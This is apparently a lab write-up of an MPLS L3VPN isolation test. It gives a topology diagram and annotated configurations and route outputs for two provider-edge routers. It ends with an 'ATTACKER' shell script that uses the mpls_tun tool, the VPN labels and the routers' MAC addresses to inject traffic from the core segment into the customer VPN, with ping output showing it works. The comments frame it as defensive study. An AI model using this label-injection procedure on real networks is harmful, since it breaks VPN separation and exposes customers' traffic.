***************
*    VPN1     *
*172.31.2.0/24*
***************
       *
       *
*******************   *******************   *******************
*       PE1       *****     ATTACKER    *****       PE2       *
*00:1e:f7:9e:40:71*   *                 *   *00:1f:9d:44:8c:c0*
*      2811       *   *******************   *     3750-ME     *
*******************                         *******************           
                                                        *
                                                        *
                                                ***************
                                                *     VPN2    *
                                                *172.31.1.0/24*
                                                ***************


PE1:

! PE1 configuration excerpt (2811 in the diagram above). Only the parts relevant
! to the L3VPN lab are shown.
!
! VRF "shmoo": RD 100:1, with the same route-target exported and imported, so
! routes from every PE that uses RT 100:1 land in this one VRF.
ip vrf shmoo
 rd 100:1
 route-target export 100:1
 route-target import 100:1
!

! Loopback0 is the iBGP source address (see update-source below).
interface Loopback0
 ip address 192.168.1.2 255.255.255.255
!
! Customer-facing side: VPN1 (172.31.2.0/24) is attached to the VRF here.
! NOTE(review): the "sh ip route vrf shmoo" output further down lists the
! connected route on FastEthernet0/0.100, so a subinterface was presumably in
! use when the output was captured - confirm against the running config.
interface FastEthernet0/0
 ip vrf forwarding shmoo
 ip address 172.31.2.1 255.255.255.0
 duplex auto
 speed auto
!
! Core-facing side: MPLS forwarding is enabled on the 10.10.10.0/24 segment,
! which per the diagram is the segment the ATTACKER host sits on.
! Security note: labelled frames received on an MPLS-enabled interface are
! forwarded on their label alone. Nothing in this excerpt authenticates the
! sender, so VPN separation here depends on only trusted devices having
! layer-2 access to this segment.
interface FastEthernet0/1
 ip address 10.10.10.2 255.255.255.0
 duplex auto
 speed auto
 mpls ip
!
! IGP for the core link and the loopback.
! NOTE(review): no OSPF authentication is visible in this excerpt.
router ospf 1
 log-adjacency-changes
 network 10.10.10.0 0.0.0.255 area 0
 network 192.168.1.2 0.0.0.0 area 0
!
! iBGP (AS 1) to PE2's loopback. The vpnv4 address family carries the VPN
! prefixes and their labels; "send-community both" includes the extended
! communities that hold the route-targets. The VRF address family advertises
! the connected customer subnet.
! NOTE(review): no "neighbor ... password" is visible in this excerpt. Session
! authentication protects the control plane only; it does not affect what
! labelled data-plane traffic the core interface accepts.
router bgp 1
 no synchronization
 bgp log-neighbor-changes
 neighbor 192.168.1.1 remote-as 1
 neighbor 192.168.1.1 update-source Loopback0
 no auto-summary
 !
 address-family vpnv4
  neighbor 192.168.1.1 activate
  neighbor 192.168.1.1 send-community both
 exit-address-family
 !
 address-family ipv4 vrf shmoo
  redistribute connected
  no synchronization
 exit-address-family



#sh bgp vpnv4 unicast vrf shmoo labels
   Network          Next Hop      In label/Out label
Route Distinguisher: 100:1 (shmoo)
   172.31.1.0/24    192.168.1.1     nolabel/16
   172.31.2.0/24    0.0.0.0         17/aggregate(shmoo)

#sh ip route vrf shmoo
Routing Table: shmoo
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

     172.31.0.0/24 is subnetted, 2 subnets
C       172.31.2.0 is directly connected, FastEthernet0/0.100
B       172.31.1.0 [200/0] via 192.168.1.1, 02:27:16




PE2:


!
! PE2 configuration excerpt (3750-ME in the diagram above). Only the parts
! relevant to the L3VPN lab are shown.
!
! VRF "shmoo": same RD and route-target values as on PE1, so both PEs exchange
! routes for this VPN.
ip vrf shmoo
 rd 100:1
 route-target export 100:1
 route-target import 100:1
!

! Loopback0 is the iBGP source address (see update-source below).
interface Loopback0
 ip address 192.168.1.1 255.255.255.255
!
! Access port in VLAN 19, the customer VLAN whose SVI (Vlan19) is in the VRF.
interface FastEthernet1/0/19
 switchport access vlan 19
!
! NOTE(review): no configuration is shown for this port; presumably it is a
! core-facing port left in the default VLAN - confirm.
interface FastEthernet1/0/24
!
! Core-facing SVI: MPLS forwarding is enabled on the 10.10.10.0/24 segment,
! which per the diagram is the segment the ATTACKER host sits on.
! Security note: labelled frames received on an MPLS-enabled interface are
! forwarded on their label alone. Nothing in this excerpt authenticates the
! sender, so VPN separation here depends on only trusted devices having
! layer-2 access to this VLAN.
interface Vlan1
 ip address 10.10.10.1 255.255.255.0
 mpls ip
!
! Customer-facing SVI: VPN2 (172.31.1.0/24) is attached to the VRF here.
interface Vlan19
 ip vrf forwarding shmoo
 ip address 172.31.1.1 255.255.255.0
!
! IGP for the core link and the loopback.
! NOTE(review): no OSPF authentication is visible in this excerpt.
router ospf 1
 log-adjacency-changes
 network 10.10.10.0 0.0.0.255 area 0
 network 192.168.1.1 0.0.0.0 area 0
!
! iBGP (AS 1) to PE1's loopback. The vpnv4 address family carries the VPN
! prefixes and their labels; the VRF address family advertises the customer
! subnet both through "redistribute connected" and an explicit network
! statement.
! NOTE(review): no "neighbor ... password" is visible in this excerpt. Session
! authentication protects the control plane only; it does not affect what
! labelled data-plane traffic the core interface accepts.
router bgp 1
 no synchronization
 bgp log-neighbor-changes
 neighbor 192.168.1.2 remote-as 1
 neighbor 192.168.1.2 transport path-mtu-discovery
 neighbor 192.168.1.2 update-source Loopback0
 !
 address-family vpnv4
  neighbor 192.168.1.2 activate
  neighbor 192.168.1.2 send-community both
 exit-address-family
 !
 address-family ipv4 vrf shmoo
  redistribute connected
  no synchronization
  network 172.31.1.0 mask 255.255.255.0
 exit-address-family



#sh bgp vpnv4 unicast vrf shmoo labels
   Network          Next Hop      In label/Out label
Route Distinguisher: 100:1 (shmoo)
   172.31.1.0/24    0.0.0.0         16/nolabel(shmoo)
   172.31.2.0/24    192.168.1.2     nolabel/17

#sh ip route vrf shmoo
Routing Table: shmoo
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

     172.31.0.0/24 is subnetted, 2 subnets
B       172.31.2.0 [200/0] via 192.168.1.2, 02:26:51
C       172.31.1.0 is directly connected, Vlan19






ATTACKER:



# cat test.sh

#!/bin/sh
# Lab test for the topology on this page: checks whether a host on the core
# segment between PE1 and PE2 can exchange traffic with the "shmoo" VPN.
#
# What the result means for a defender: the values passed to mpls_tun are just
# the two VPN labels and the two PE MAC addresses listed earlier on this page.
# No credential or key is involved, so VPN isolation in this setup rests
# entirely on keeping untrusted hosts off the MPLS core segment. Where the core
# cannot be trusted, traffic needs protection that does not depend on it, such
# as encryption between the customer sites.

# Start the tunnel tool in l3vpn mode on br0, in the background.
#   -i 17 / -o 16 : match the labels in the "sh bgp vpnv4 unicast vrf shmoo
#                   labels" output (17 = PE1's label for 172.31.2.0/24,
#                   16 = PE2's label for 172.31.1.0/24).
#   -I / -O       : PE1's and PE2's MAC addresses from the diagram; the tool's
#                   log further down reports sending to the -O address.
./mpls_tun -m l3vpn -d br0 -D br0 -i 17 -o 16 -I 00:1e:f7:9e:40:71 -O 00:1f:9d:44:8c:c0 -v &
# Presumably gives the tool time to create tun0 before it is configured.
sleep 2
# Give tun0 an address inside VPN1's subnet (172.31.2.0/24).
ifconfig tun0 172.31.2.11/24
# Reduced MTU - presumably headroom for the added encapsulation; confirm.
ifconfig tun0 mtu 1300
# Send traffic for VPN2's subnet through the tunnel interface.
route add -net 172.31.1.0/24 dev tun0
# 172.31.1.1 is PE2's Vlan19 address inside the VRF; replies mean traffic from
# the core segment was accepted into the VPN.
ping 172.31.1.1




# ./test.sh

mpls_tun version 0.1	by Daniel Mende - dmende@ernw.de
Tunnel interface tun0 started
Opening tunnel at br0 with MAC 00:1e:f7:9e:40:71
Sending to MAC 00:1f:9d:44:8c:c0 on interface br0
PING 172.31.1.1 (172.31.1.1) 56(84) bytes of data.
64 bytes from 172.31.1.1: icmp_seq=1 ttl=255 time=2.96 ms
64 bytes from 172.31.1.1: icmp_seq=2 ttl=255 time=2.42 ms
64 bytes from 172.31.1.1: icmp_seq=3 ttl=255 time=2.04 ms
64 bytes from 172.31.1.1: icmp_seq=4 ttl=255 time=1.67 ms
64 bytes from 172.31.1.1: icmp_seq=5 ttl=255 time=1.16 ms
^C
--- 172.31.1.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4013ms
rtt min/avg/max/mdev = 1.162/2.054/2.964/0.618 ms
